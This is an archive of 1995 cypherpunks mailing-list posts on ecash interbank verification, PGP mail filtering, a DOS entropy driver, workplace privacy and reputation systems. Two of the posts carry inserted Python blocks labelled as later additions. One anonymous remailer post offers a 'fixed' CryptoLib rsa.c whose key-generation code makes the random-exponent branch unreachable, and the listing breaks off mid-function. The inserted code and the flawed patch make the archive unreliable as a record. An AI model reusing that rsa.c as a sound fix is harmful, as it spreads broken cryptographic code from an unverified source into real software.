analogy, would you want to have to have accounts in 500 banks if your
customers also used 500 different banks?  The other alternative for the
ecash case would be if Bank-B's-customer could bypass Bank-B by validating
the ecash directly with Bank A.  If it passes, then he must now look at 
the matter of Acceptance.

Now Bank-B's-customer knows that the ecash is valid.  He keeps it
temporarily in his hard disk.  But will Bank B ever Accept it as a
deposit?  If it doesn't, then Bank-B's-customer needn't worry that much. 
He can just use that ecash for transactions purposes.  Just because you
can't deposit every cent of cash that you earn doesn't mean that your cash
is worthless.  The fundamental test of ecash is whether merchants/customer
will accept it.  Of course, there is also important value in checking if
Banks will accept deposits of it, but I consider that secondary. 
 
So some concluding topics include:

+ independent verification of ecash.  some formal system for ecash
merchants (sellers) to check directly with the issuing bank that the 
ecash hasn't been double spent.

OR

+ interbank verification of ecash.  formal interbank system for the
client's bank to check the issuing bank to see if the ecash hasn't been
double spent. 

AND

+ interbank acceptance of ecash.  formal acceptance of verified ecash 
deposits, no matter the issuing bank.

The type of verification doesn't really matter that much.  Some sort of 
distributed method of resolving ecash issuers has to be standardized (say 
like the DNS, each ecash coin has some information as to the issuer.  
person/bank that wants to verify just transmits that ecash to its 
original issuer and then receives a reply saying: verified (usable) or 
not (double spent).

The interbank acceptance issue is more important, but digicash (the
company) has some power here.  If they really aim at ecash being true
cash (instead of checking), then they gotta force all issuing banks to
accept ecash deposits no matter the original issuer.  Like the Real Life
cash system: all banks accept cash, even though it is the federal reserve
that was the original issuer. 


-------------------------------------------------------------------------------
Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
eMAIL: pati@ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics		-Johann W.Von Goethe
-------------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Hamilton <martin@mrrl.lut.ac.uk>
Date: Fri, 22 Dec 95 07:48:35 PST
To: cypherpunks@toad.com
Subject: Re: Navy hacked by Air Force?
In-Reply-To: <9512221202.AA06399@all.net>
Message-ID: <199512221547.PAA27415@gizmo.lut.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Dr. Frederick B. Cohen writes:

| > The exact method of entry remains a classified secret.
| 
| The first (only?) really true part of the story.

To combine two favourite threads - it's that sendmail 8.7.3 hole 
*they* don't want you to know about...!

Cheerio, (and Merry Xmas :-)

Martin






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Sat, 23 Dec 95 02:30:26 PST
To: cypherpunks@toad.com
Subject: Re: Cypherpunks resumes?
Message-ID: <9512231030.AA05276@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: attila the Hutt

	So, who the fuck am I?  --just another aging 300 lb gorilla, 
    long haired hippie California freak with an outlaw chopper. 

...................................................


Such a lovely place... such a lovely face...
            <g>


(sorry, I couldn't help myself)
  ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Juzzy <trance@techno.magna.com.au>
Date: Mon, 22 Jan 96 14:21:25 PST
To: cypherpunks@toad.com
Subject: ecash
Message-ID: <Pine.LNX.3.91.951223091637.119A-100000@techno.magna.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

	I'm new to this mailing list and i was wondering if someone could 
post me some information on ecash, what it is, and its implementation.

						Thank You

						Justin Walker




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 23 Dec 95 09:11:00 PST
To: cypherpunks@toad.com
Subject: PAN_maw
Message-ID: <199512231710.MAA23442@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-23-95. WashP:


   CyberCash this week plans to offer its shares of stock to
   the public. It is one of a handful of fledgling companies
   that hope to coin profits by helping others make financial
   transactions on the Internet. But consumers still worry
   that hackers on the Internet can ferret out credit card
   information. CyberCash's technology blocks online seeing of
   unscrambled credit card numbers. CyberCash and its IPO
   advisors believe they have developed schemes that will
   convince lemmings that there is the equivalent of
   steel-plated armor around their life savings as they vanish
   into the Internet's mega-panamaW$.

   "This is the latest Internet digital currency slaughter-
   offer for fat-fee hacking our Widows and Orphans Ever-Safe
   Pensions," choraled a split-gut ice-eyed Santanalyst.

   PAN_maw  (5 kb)














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 24 Dec 95 09:14:09 PST
To: ericm@lne.com (Eric Murray)
Subject: Re: CFS and Linux
In-Reply-To: <199512241606.IAA04460@slack.lne.com>
Message-ID: <199512241717.MAA29337@homeport.org>
MIME-Version: 1.0
Content-Type: text


Eric Murray wrote:

| Where we're headed is mail filters with PGP imbedded (PGP 3 will
| make this much easier) that check incoming mail for a valid signature
| for certain PGP keyid/fingerprints and pass that mail along.
| Other mail that doesn't match gets tossed into a 'junk' folder
| or thrown away if you really don't want to talk to anyone that you
| don't already know.

I agree with the assessment of where we may be going, but the
technology is available now.  (Marshall Rose uses it; if you want to
get mail into his private mailbox, offer him some $ via imbedded FV
authorizations in the mail, and it goes into his inbox.  If he thinks
it was worth his time, he doesn't charge you.)

Anyway, the code is definitely available now.  The back end is a
little kludgy, but it was needed for an auto key retrieval script.
This could easily be hacked to include a +pubring=$people line.  The
script gives you a keyid, which you can then use to filter on, ie:

:0BW
* -----BEGIN PGP
KEYID=|sender_unknown
# the sender unknown script is below

:0:
? [ $KEYID = (`cat .buddies`) ]
| /var/spool/mail/adam

:0e:
junk

#!/bin/sh
# unknown returns a keyid, exits 1 if the key is known
# $OUTPUT is to get the exit status. Otherwise, this would be a one liner.
OUTPUT=`pgp -f +VERBOSE=0 +batchmode  -o /dev/null`
# $OUTPUT is left unquoted so echo flattens it to one line for awk's $6.
# grep -q gives status only (older egrep spelled this -s).
echo $OUTPUT | grep -q 'not found in file'
EV=$? 
if [ $EV -eq 0 ]; then 
        echo $OUTPUT | awk '{print $6}' 
fi
exit $EV


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: combee@techwood.org (Ben Combee)
Date: Wed, 27 Dec 95 08:11:43 PST
To: cypherpunks@toad.com
Subject: Austin CPunk Video Update
Message-ID: <199512271611.KAA16961@matrix.eden.com>
MIME-Version: 1.0
Content-Type: text/plain


First, a lot of thanks to all of you who sent me ideas for the
Cypherpunk video we are working on here in Austin.  I'm sorry I
haven't individually acknowledged all of you, but it has been a
busy couple of months.

Here is our status:

We have agreed on the meeting infrastructure, with a video working
group meeting twice a month for planning/strategy meetings and at
other times for filming, editing, and so on.

We have decided to do a 30 minute video with segments dealing with
crypto history, basic theory, popular applications, and possible
futures.  We may go on to produce further videos which look at
these topics in more detail.

We have an outline of the segments of the video.  The outline was
originally conceived for a 60 minute program, so some items might
have to be cut.  This outline should be available online sometime
soon off my web page at http://www.yak.net/combee/crypto/ (URL not
yet active).

This program will initially air on Austin's public access stations,
but we have nebulous plans to distribute it once that requirement
is met.

Questions?  Just write to me or to all the Austin CPunks at
austin-cpunks@einstein.ssz.com.

-- 
        eebmoC .L nimajneB | Benjamin L. Combee                (REVERSE) 
       gro.doowhcet@eebmoc | combee@techwood.org           (ENGINEERING) 
\eebmoc\ten.kay.www\\:ptth | http://www.yak.net/combee/        (RESERVE)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hittinger <bugs@ritz.mordor.com>
Date: Wed, 27 Dec 95 08:12:06 PST
To: cypherpunks@toad.com
Subject: Re: a new idea: stocks == currency
Message-ID: <199512271611.LAA20760@ritz.mordor.com>
MIME-Version: 1.0
Content-Type: text



> I've not seen promoted by any single author yet (although I have seen
> some prominent cpunks argue the opposite).

There was a book written some time ago called "SuperMoney" that basically
argues this point (that stocks were not only money, they were *better*
than money).

One example would be a deposit at a bank.  How can you tell if there is a
potential solvency problem at the bank?  One quick and easy check is to
look at the value of the stock of the bank!

You see this behavior in currencies when you are exchanging a stronger one
for a weaker one or vice versa :-)

PS: I read Prechter's "turn of the tidal wave" book over the holidays, and
although it is mostly dry, it is an interesting read.

Regards,

Mark Hittinger
Netcom/Dallas
bugs@freebsd.netcom.com
bugs@ritz.mordor.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 27 Dec 95 03:40:38 PST
To: cypherpunks@toad.com
Subject: Re: New release (v.1.3.2) of CFS Unix encrypting file system available
Message-ID: <199512271140.MAA04896@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


>Source code for the latest version (release 1.3.2) of CFS, the Cryptographic
>File System, is now available upon request for research and experimental
>use in the US and Canada.

Does anyone know if this code has made it across the pond yet?

If so please post the ftp location to sci.crypt or comp.os.linux.misc.
I don't read this list.

Thanx.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "T.R. Cox" <tadc@thetics.europa.com>
Date: Wed, 27 Dec 95 16:52:05 PST
To: nobody@mail.uu.net
Subject: Re: BoS: Re: Misconfigured Web Servers
In-Reply-To: <9511278200.AA820083186@cc2.dttus.com>
Message-ID: <Pine.SUN.3.91.951227164940.5515F-100000@thetics.europa.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Dec 1995, David Klur wrote:

>      
>      Re: the "trick" below... an even more effective search is the 
>      following...
>      
Is it just me, or is everyone getting a dozen of these?

////////////////////////////////////////////////////////////////////////\
|Thaddeus Cox = tadc@europa.com <==- Finger for standard legal disclaimer|
|\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|Are you using Europa?  You ought to be-- Dial 503.222.4244, login as new |
\/////////////////////////////////////////////////////////////////////////





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jason D. Livingood/WSC"@hks.net
Date: Wed, 27 Dec 95 13:54:19 PST
To: cypherpunks@toad.com
Subject: Employer Probing Precedents?
Message-ID: <199512272151.QAA05241@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To Whom It May Concern:

I was curious as to where I might find some electronic freedom legal 
precedents.  If, for example, an employer was planning to probe file systems on 
PCs in the off-hours and employees began encrypting their hard drives, what 
legal precedents would support the employees or would support the employer in 
blocking the encryption?

Thanks for any info you can give me!!

Jason Livingood
jlivingood@hammer.net 

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMOG/6ioZzwIn1bdtAQHQ2QF/cOq8vE9o+V/yGuk5KLbYv5E6xWJjV2cB
pSHFhr4O0HtiTgOtTxMhylVmXFZpuosm
=fIWG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.dfw.net>
Date: Wed, 27 Dec 95 16:49:25 PST
To: Lou Poppler <lwp@mail.msen.com>
Subject: Re: Reputation capital: FIBS case study
In-Reply-To: <2sY4wMz2BcRC083yn@mail.msen.com>
Message-ID: <Pine.SUN.3.91.951227183553.9402A-100000@dfw.dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Dec 1995, Lou Poppler wrote:

> 
> I'm not really asking for suggestions here or anything.  It's likely that
> most of them have already been debated to death on r.g.b.  I just wanted
> to show you a case of reputation markets in action.

If the server can keep track of drop games and the restart it should not
be difficult to keep a record for each player of how many games he
has dropped and not restarted. A high number would mean a cheater
or someone with a very bad phone line. In either case you don't want to play
with them.

For the second problem there is no easy solution. One thing to make it more
annoying for the cheater is to keep a history of matches played by each
player. A player that has played 50 matches with another one and won all
is either cheating or not looking for a challenge. Of course the cheater
just has to create a new nym each time to play again in this case.
Bottom line is that on the net a nym can be multiple persons and a person
can have multiple nyms.

> ::::::::::::::::::::::::::::::::::::::    Thank you VERY much!  You'll be 
> ::  Lou Poppler <lwp@mail.msen.com> ::   getting a Handsome Simulfax Copy 
> ::      http://www.msen.com/~lwp/   ::   of your OWN words in the mail
> ::::::::::::::::::::::::::::::::::::::   soon (and My Reply).
> 

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 
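
Added example, not part of the original message and not FIBS server code: the two records suggested above (games dropped and never restarted, and per-pair match history), computed over a constructed event log, including the fresh-nym case that the pair check cannot see. The event format, thresholds and all names are assumptions.

```python
from collections import Counter

# Constructed event log (not real FIBS data). Assumed record shapes:
#   ("drop", game_id, nym_that_dropped)   ("resume", game_id)
#   ("result", winner_nym, loser_nym)
CONSTRUCTED_LOG = (
    [("drop", 1, "flaky"), ("resume", 1),
     ("drop", 2, "quitter"), ("drop", 3, "quitter"), ("drop", 4, "quitter"),
     ("drop", 5, "flaky")]
    + [("result", "mallet", "patsy")] * 50
    + [("result", "alice", "bob")] * 30
    + [("result", "bob", "alice")] * 25
    # One person rotating through 50 throwaway nyms against the same opponent.
    + [("result", f"nym{i:02d}", "patsy") for i in range(50)]
)


def unresumed_drops(log):
    """Count, per nym, the games it dropped that were never restarted."""
    open_drops = {}  # game_id -> nym that dropped it
    for event in log:
        if event[0] == "drop":
            open_drops[event[1]] = event[2]
        elif event[0] == "resume":
            open_drops.pop(event[1], None)  # a restart clears the drop
    return Counter(open_drops.values())


def lopsided_pairs(log, min_matches=50):
    """Return (winner, loser, n) for pairs where one nym won all n >= min_matches."""
    wins = Counter()
    for event in log:
        if event[0] == "result":
            wins[(event[1], event[2])] += 1
    flagged = []
    for (winner, loser), n in wins.items():
        # Counter lookups of missing keys return 0 without inserting.
        if n >= min_matches and wins[(loser, winner)] == 0:
            flagged.append((winner, loser, n))
    return sorted(flagged)


def suspects(log, max_drops=2, min_matches=50):
    """Nyms flagged by either record. Throwaway nyms stay below both thresholds."""
    by_drops = {nym for nym, n in unresumed_drops(log).items() if n > max_drops}
    by_pairs = {winner for winner, _, _ in lopsided_pairs(log, min_matches)}
    return by_drops | by_pairs


if __name__ == "__main__":
    print("unresumed drops:", dict(unresumed_drops(CONSTRUCTED_LOG)))
    print("lopsided pairs: ", lopsided_pairs(CONSTRUCTED_LOG))
    print("suspects:       ", sorted(suspects(CONSTRUCTED_LOG)))
```

In the constructed log "patsy" loses 100 matches, but only the 50 lost to a single nym are flagged; the 50 lost to one-off nyms leave no per-pair history to count.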






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kurt Buff (Volt Comp)" <a-kurtb@microsoft.com>
Date: Thu, 28 Dec 95 10:52:58 PST
To: "cypherpunks@toad.com>
Subject: FW: proposal for new cyber abbreviation
Message-ID: <c=US%a=_%p=msft%l=RED-06-MSG951228104009PV00ED00@red-70-msg.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


TOBAL - There Oughta Be A Law...

Same thing, easier on the mouth.

Kurt

----------
From: 	Vladimir Z. Nuri[SMTP:vznuri@netcom.com]
Sent: 	Wednesday, December 27, 1995 11:47
To: 	cypherpunks@toad.com
Subject: 	proposal for new cyber abbreviation


yes, cyberspace just doesn't have enough acronyms like AFAIK and IANAL etc.
ad nauseam. (I have reason to believe that PTB, or "powers that be" was
actually invented here on this list!!) 

anyway after reading recent messages I propose:

SHTBD!!!!

as in, Something Has To Be Done.

used either seriously or satirically (probably mostly satirically by
everyone here).

example:

"there was an editorialist on TV ranting about the 4 horsemen of the
infocalypse and screeching that SHTBD!!!"

or,

"I was not implying that SHTBD, merely that we are moving into a brave
new world in cyberspace".

or,

"those @#$%^&* online pedophiles are crawling all over the net. SHTBD!!!"

or,

"the @#%^^&* mainstream press is always pointing out new bogeymen
with the concluding moral, SHTBD!!!"


notice that SHTBD is the antithesis of cypherpunk philosophy in that
it tends to imply

1. government intervention
2. coercive force
3. censorship

etc.

hence by using this term and popularizing it, we promote our own agenda
of "cryptoanarchy".

just my small contribution to humanity for today.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Thu, 28 Dec 95 10:11:46 PST
To: futplex@pseudonym.com
Subject: Re: Telcom bill report
Message-ID: <01HZCBJ2O0DC8Y55KS@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"futplex@pseudonym.com" 28-DEC-1995 01:20:39.13

>Thanks ever so much for posting my non-list-relevant private mail to the list.
------------
	Oh, bloody hell. Oops... you (and anyone else bothered by the, as you
point out, irrelevant mail) have my sincerest apologies. I didn't notice the
lack of a CC: to cypherpunks (it's buried in the headers and I was lacking in
sleep, but that's no excuse), and consequently goofed.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Thu, 28 Dec 95 12:44:44 PST
To: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Subject: Re: DOS - MD5 - Thanks
In-Reply-To: <Pine.3.89.9512271424.D29727-0100000@wane3.scri.fsu.edu>
Message-ID: <199512282039.PAA21627@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


"P.J. Ponder" writes:
>Thanks to everyone who offered help on the MD5 for DOS.
>Greg Broiles pointed me to the pgp source, which may do the
>trick. (There is MD5 module in pgp[?]) I will investigate.
>
>For everyone's info, didn't find a freestanding dos 
>implementation, tho.  My copy of Schneier didn't have the
>disk, so I don't know if it's there, either.

I have source code to a program called "md5sum".  The comments indicate
that it works on DOS, as well as unix.  It's three source files, a
"main", a ".h", and "md5.c", which implements the md5 hash.

Want it?

P.S.  There's also source code for MD5 in the RFC1321, available
from ftp.internic.net.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com
Date: Thu, 28 Dec 95 12:25:56 PST
To: cypherpunks@toad.com
Subject: ANNOUNCE: NOISE.SYS random sampling device for DOS v0.2Beta
Message-ID: <199512282034.PAA25359@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Re: NOISE.SYS Random Sampling Device Driver for DOS (v0.2-Beta):

I've finally gotten a usable version of NOISE.SYS written.  The beta
is ready for semi-public release and review.  If you're interested in
testing it or examining the code, email me at <wlkngowl@unix.asb.com>

It's only a prototype version.  I do not know any strong methods of
testing random data.  If anyone is willing to help on that part or
point me in the right direction, it would be appreciated...

What this driver does:

When loaded, it hooks onto the keyboard interrupt (0x09) and collects
fast timings between keystrokes.  It can also be easily configured at
compilation to sample other interrupts, as well as collect "seedling"
keystrokes upon initialization.

It sets up a character device called RANDOM, that when polled takes
the earliest collected bytes from the random pool (size can be adjusted),
combines them with a count-word based on the number of samples collected
plus the number of times the driver has fetched data from the pool,
transforms it using the Secure Hash algorithm, and outputs the bits from
the hash.

It's only a prototype: this version doesn't check to see if the pool is
"empty" at the moment.

Features: written in 386 assembler, takes under 2k of memory and can be
loaded from the command line using a utility like DEVLOD.  Also under
GPL, so you've got the source-code to play with.

Comments and criticism from crypto-gurus would be greatly appreciated.
Reply if you'd like me to send a copy.  (Important Q: is this software
covered under ITAR?!?)

- --Rob <wlkngowl@unix.asb.com>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOL8gNscUKerH0gxAQHNlAP/eZChSaAEg3go/vxfm9Z0Af5Dfa4WBDhh
SfbbpsYfymSkxFbU7bHUfRMFHk+Uy57AeGMUxXkgml7KO8cxyOPS6yVDcNWf6Z9W
OeXtXRAFBWRn3CblT1sQzl5YCEG93YBZS9ZkbTsN4rgTcpo15QY8vG5BJCEgfP9f
9XHn5VGSkVo=
=jaNN
-----END PGP SIGNATURE-----
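
Added example, not part of the original post and not the NOISE.SYS source: a Python model of the RANDOM device as the announcement describes it (earliest pooled bytes combined with a count-word, then hashed), showing what a read returns once the pool is empty and the check the prototype is said to lack. SHA-1 stands in for the "Secure Hash algorithm"; the pool size, read size, 16-bit count-word, use of the low byte of each timing delta, and all names are assumptions.

```python
import hashlib
import struct
from collections import deque


class PoolEmpty(Exception):
    """Raised when fewer fresh samples are pooled than one read consumes."""


class NoisePool:
    def __init__(self, pool_size=64, read_size=8):
        # Assumption: when the pool is full the oldest byte is dropped.
        self.pool = deque(maxlen=pool_size)
        self.read_size = read_size
        self.samples = 0        # timing samples collected so far
        self.fetches = 0        # reads served so far
        self._last_tick = None

    def keystroke(self, tick):
        """Keyboard-interrupt hook: pool the low byte of the inter-keystroke delta."""
        if self._last_tick is not None:
            self.pool.append((tick - self._last_tick) & 0xFF)
            self.samples += 1
        self._last_tick = tick

    def _count_word(self):
        # "number of samples collected plus the number of times the driver
        # has fetched data from the pool", truncated to 16 bits (assumption).
        return (self.samples + self.fetches) & 0xFFFF

    def read(self, check_empty=True):
        """Return one hash block built from the earliest pooled bytes."""
        if check_empty and len(self.pool) < self.read_size:
            raise PoolEmpty("not enough fresh samples pooled")
        n = min(self.read_size, len(self.pool))
        earliest = bytes(self.pool.popleft() for _ in range(n))
        block = earliest + struct.pack("<H", self._count_word())
        self.fetches += 1
        return hashlib.sha1(block).digest()


def guess_unseeded_output(observed, max_count=0x10000):
    """Return the count-word that alone reproduces `observed`, else None.

    A match means the output contained no pooled timing bytes at all.
    """
    for count in range(max_count):
        if hashlib.sha1(struct.pack("<H", count)).digest() == observed:
            return count
    return None


# Constructed timer readings at nine keystrokes (eight deltas).
CONSTRUCTED_TICKS = [1000, 1873, 2410, 4099, 4312, 6020, 6555, 8801, 9017]


def demo():
    pool = NoisePool(read_size=8)
    for tick in CONSTRUCTED_TICKS:
        pool.keystroke(tick)
    seeded = pool.read()                      # consumes all eight samples
    try:
        pool.read()                           # checked read on an empty pool
        refused = False
    except PoolEmpty:
        refused = True
    unchecked = pool.read(check_empty=False)  # the prototype's behaviour
    return seeded, refused, guess_unseeded_output(unchecked)


if __name__ == "__main__":
    seeded, refused, guessed = demo()
    print("seeded read:       ", seeded.hex())
    print("empty read refused:", refused)
    print("unchecked read reproduced from count-word:", guessed)
```

With no pooled bytes left, the unchecked read is the hash of a 16-bit counter, so at most 65536 trial hashes recover it; the checked read refuses instead.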





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Thu, 28 Dec 95 13:26:59 PST
To: David Mandl <dmandl@bear.com>
Subject: Re: Employer Probing Precedents?
In-Reply-To: <Pine.SUN.3.91.951228091552.4338d-100000@goya>
Message-ID: <199512282126.QAA22624@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


David Mandl writes:
>All I'll say here is that I disagree strongly with the views Tim May
>posted about employees' property rights, etc. (though we agree on most
>other things).

I have to agree with David.

I don't think that "property rights" are quite as clear-cut as Tim
claims.  By granting use of certain equipment to a single employee,
such as a desk, a uniform, or personal computer, the employer has
invested that employee with a vague sort of limited ownership of the
item.

The notion that, simply because you're wearing a uniform owned by your
employer, you're subject to physical search at the employer's
discretion is laughable.  This and searching the
computer on one's desk differ only in degree, IMO.

Property rights *are* fundamental to many other human rights, but they
aren't the exclusive basis of them.  The right of self-determination
isn't based in property (except to the extent that one may be said to
inalienably own oneself, but this is really an analogy), and is equally
fundamental to human rights.

Many of the issues related to workplace privacy concerns exhibit
conflicts between these two.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Date: Thu, 28 Dec 95 14:12:55 PST
To: adam@lighthouse.homeport.org (Adam Shostack)
Subject: Re: URL for cypherpunks
In-Reply-To: <199512281556.KAA05580@homeport.org>
Message-ID: <30e316546c20002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


According to rumor, Adam Shostack said:
> 
> 	The csua.cs.bezerkely site is good, but hasn't been maintained
> in a while.  (Unfortunately, there is enough cypherpunk & related
> stuff out there that maintaining a really good site would be a full
> time job.  That's not a flame at any of the people out there who do good
> work, just a wish for a really well organized www.cypherpunks.org
> library & pointer list, should someone decide to pay for it. :)

Looks like someone has...

maroon% whois2 cypherpunks.org
CypherPunks Group (CYPHERPUNKS3-DOM)
   9705 Standford Road
   Ft. Meade, MD 20755
 
   Domain Name: CYPHERPUNKS.ORG
 
   Administrative Contact, Technical Contact, Zone Contact:
      One, Aleph  (EML2)  aleph1@DFW.NET
      999-999-9999
 
   Record last updated on 03-Oct-95.
   Record created on 03-Oct-95.
 
   Domain servers in listed order:
 
   DNS.CYBERWORKS.NET           205.164.71.20
   NS2.PARANOIA.COM             204.157.153.18
   WKP.COM                      205.199.64.11
 
 
The InterNIC Registration Services Host contains ONLY Internet Information
(Networks, ASN's, Domains, and POC's).
Please use the whois server at nic.ddn.mil for MILNET Information.

maroon% host www.cypherpunks.org
www.cypherpunks.org is a nickname for cypherpunks.org
cypherpunks.org has address 205.164.71.100


-- 
Kevin L. Prigge         |"Have you ever gotten tired of hearing those 
UofM Central Computing  | ridiculous AT&T commercials claiming credit 
email: klp@tc.umn.edu   | for things that don't even exist yet? 
010010011101011001100010| You will." -Emmanuel Goldstein 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gorkab@sanchez.com (Brian Gorka)
Date: Thu, 28 Dec 95 14:01:43 PST
To: "'cypherpunks@toad.com>
Subject: IwinPak
Message-ID: <01BAD546.1C3B8640@loki>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone ever seen or heard of this company?  They use PGP as an encryption transport for secure mail and transactions (at a price of course)

http://www.iwinpak.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Thu, 28 Dec 95 09:21:40 PST
To: cypherpunks@toad.com
Subject: Cryptolib 1.1 rsa.c
Message-ID: <199512281722.RAA18284@pangaea.ang.ecafe.org>
MIME-Version: 1.0
Content-Type: text/plain


I am informed that there is a serious bug in the version of cryptolib
that gets sent to people who don't have RSA licenses.  The bug
prevents it from doing RSA encrypt, decrypt or signature.  I cannot
imagine how this bug slipped through but it seems only to exist in the
copies of cryptolib that are sent to those without RSA licenses.
Fortunately I have an RSA license and so my new copy (thanks Jack and
Matt!) does not suffer from the bug.

Here is the version of rsa.c that fixes the bug.

/*
 * This is version 1.1 of CryptoLib
 *
 * The authors of this software are Jack Lacy, Don Mitchell and Matt Blaze
 *              Copyright (c) 1991, 1992, 1993, 1994, 1995 by AT&T.
 * Permission to use, copy, and modify this software without fee
 * is hereby granted, provided that this entire notice is included in
 * all copies of any software which is or includes a copy or
 * modification of this software and in all copies of the supporting
 * documentation for such software.
 *
 * NOTE:
 * Some of the algorithms in cryptolib may be covered by patents.
 * It is the responsibility of the user to ensure that any required
 * licenses are obtained.
 *
 *
 * SOME PARTS OF CRYPTOLIB MAY BE RESTRICTED UNDER UNITED STATES EXPORT
 * REGULATIONS.
 *
 *
 * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
 * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
 * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
 * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.
 */

/*
 *        Code for generating and manipulating RSA keys
 *        and doing encryption and decryption using RSA.
 *        AT&T recognizes that RSA is patented
 *        (Rivest et. al. U.S. Patent 4,405,829, issued 9/20/83).
 *	  Use of this code assumes proper licensing.
 *
 *        coded by Jack Lacy, December, 1991
 *
 */
#include "libcrypt.h"

static Key_exps *genKeyExps P((BigInt, BigInt, BigInt, int, BigInt));
static void chineseRemTheorem P((BigInt , RSAPrivateKey *, BigInt));
static void genPrimesFor3 P((int, BigInt, BigInt, BigInt, BigInt));

#ifdef K_AND_R
static Key_exps *
genKeyExps(p, q, e, ebits, randomStart)
  BigInt p, q, e;
  int ebits;
  BigInt randomStart;
#else
  static Key_exps *genKeyExps(BigInt p,
			      BigInt q,
			      BigInt e,
			      int ebits,
			      BigInt randomStart)
#endif
{
	BigInt phi, p1, q1;
	BigInt u1, ngcd, ignore;
	Key_exps *exps;
	int ebytes;
#ifdef DLLEXPORT
	HGLOBAL handle = clib_malloc(sizeof(Key_exps));
	exps = (Key_exps *)GlobalLock(handle);
	exps->exp_handle = handle;
#else
	exps = (Key_exps *)clib_malloc(sizeof(Key_exps));
#endif
	p1 = bigInit(0);
	q1 = bigInit(0);
	phi = bigInit(0);
	u1  = bigInit(0);
	ngcd = bigInit(0);
	ignore = bigInit(0);
	if (e == NULL)
		e = bigInit(3);
	
	bigSubtract(p, one, p1);
	bigSubtract(q, one, q1);
	bigMultiply(p1, q1, phi);
	freeBignum(p1);
	freeBignum(q1);
	
	/* Get public exponent, relatively prime to modulus. */
	/* A by product of the extendedGcd calculation is the inverse
	   of e mod phi, which is d, the private exponent.
	   If e has been specified, skip this.
	 */
	if (e == NULL) {
		if (ebits > 2) {
			ebytes = (ebits/8) + (ebits%8? 1: 0);
			if (randomStart == NULL) {
				bigRand(ebytes, e, PSEUDO);
			}
			else {
				bigCopy(randomStart, e);
			}
			if (EVEN(e))
				bigAdd(e, one, e);
		}
	}
	extendedGcd(e, phi, u1, ignore, ngcd);
	while (bigCompare(ngcd, one) != 0) {
		bigAdd(e, two, e);
		extendedGcd(e, phi, u1, ignore, ngcd);
	}
	exps->d = u1;
	exps->e = e;
	
	freeBignum(phi);
	freeBignum(ngcd);
	freeBignum(ignore);
	
	return exps;
}

#ifdef K_AND_R
_TYPE( RSAPublicKey * )
buildRSAPublicKey(e, n)
